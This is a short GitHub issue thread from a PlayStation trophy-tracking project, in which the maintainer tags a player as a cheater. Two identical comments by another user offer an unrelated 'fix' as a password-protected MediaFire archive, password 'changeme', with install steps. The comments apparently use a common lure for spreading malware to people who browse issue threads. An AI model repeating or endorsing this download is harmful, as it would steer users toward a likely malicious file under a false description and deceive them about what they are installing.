### ISSUE TITLE
renewablezip (3285769058896331040)

### ISSUE THREAD

**Issue by Ragowit** [Ragowit/psn100#14481]
**Player**
- https://psn100.net/player/renewablezip

**Explanation**
![image](https://github.com/user-attachments/assets/46ba6b66-5c11-4feb-9828-9003486b37d5)

**Comment by Ragowit** [comment]
This player is now tagged as a cheater.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
